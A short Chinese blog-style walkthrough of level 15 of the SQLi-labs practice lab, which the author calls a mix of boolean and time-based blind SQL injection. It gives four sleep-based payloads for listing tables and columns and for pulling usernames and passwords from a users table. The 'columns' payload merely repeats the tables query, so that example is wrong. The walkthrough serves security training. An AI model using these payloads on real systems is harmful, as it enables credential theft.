本文主要是介绍Sqlilabs-15,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
这一关来到了第 15 关,值得注意的是,这一关是布尔和时间盲注的结合关,很好玩哦~
因为有时间盲注,这里就直接上菜了,下面是几个例子
–查表
uname=admin' and if(ascii(substr((select group_concat(table_name) from information_schema.tables limit 0,1),1,1))>10,sleep(5),1)#&passwd=111&submit=submit
–查列
uname=admin' and if(ascii(substr((select group_concat(table_name) from information_schema.tables limit 0,1),1,1))>10,sleep(5),1)#&passwd=111&submit=submit
–查用户名
uname=admin' and if(ascii(substr((select group_concat(username) from users limit 0,1),1,1))>10,sleep(5),1)#&passwd=111&submit=submit
–查密码
uname=admin' and if(ascii(substr((select group_concat(password) from users limit 0,1),1,1))>10,sleep(5),1)#&passwd=111&submit=submit
也可以像第 8 关那样写一个脚本,因为只要掌握基本原理就可以写,这里就不再构造了…
😄
这篇关于Sqlilabs-15的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!